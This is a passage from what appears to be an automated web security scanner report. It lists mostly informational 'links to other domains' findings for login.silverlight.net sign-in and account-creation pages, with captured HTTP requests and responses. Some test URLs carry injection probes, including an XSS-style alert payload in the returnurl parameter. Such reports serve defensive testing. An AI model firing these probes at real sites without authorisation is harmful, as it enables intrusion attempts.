<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402633&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402633&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.139. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402515&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nmoxpluj5lbcig55wj1hbbaj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 15:58:35 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:48:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402515&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402515&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.140. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/createuser.aspx?returnurl='

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351991&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:46:30 GMT
Content-Length: 8922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351991&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&lc=1033&id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351991&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.141. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:25 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:25 GMT
Content-Length: 9085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.142. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402694&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:01:34 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:51:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402694&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402694&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.143. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344494&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:51:34 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344494&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344494&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.144. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343425&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ffuubcjgr0yyrsy3luhto445; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:33:45 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343425&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343425&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.145. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343498&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=4mfnu1i5bj2moy553ivmbd55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:34:58 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:24:58 GMT
Content-Length: 9085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343498&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343498&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.146. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/createuser.aspx?returnurl='

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351211&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:33:31 GMT
Content-Length: 8922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351211&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&lc=1033&id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351211&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.147. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402513&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13089
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=mecq5h55fmxdoki32eayru55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 15:58:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:48:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402513&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402513&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402513&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.148. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296391153&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

GET /login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.silverlight.net
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=wqo1tq45lu021p45xivwc2fl; s_cc=true; s_sq=%5B%5BB%5D%5D; omniID=1296343609010_276c_8196_7f44_eaa48f639648

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 12:39:12 GMT
Content-Length: 12978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296391153&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296391153&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296391153&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&lc=1033&id=265631">here</a>
...[SNIP]...

22.149. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402628&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=tdmhefel1tt0o2454x0bgy45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:00:28 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:50:28 GMT
Content-Length: 13160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402628&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402628&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296402628&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&lc=1033&id=265631">here</a>
...[SNIP]...

22.150. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx

The response contains the following links to other domains:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296343532&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631
https://www.passportimages.com/1033/signin.gif

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13089
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:35:32 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:25:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
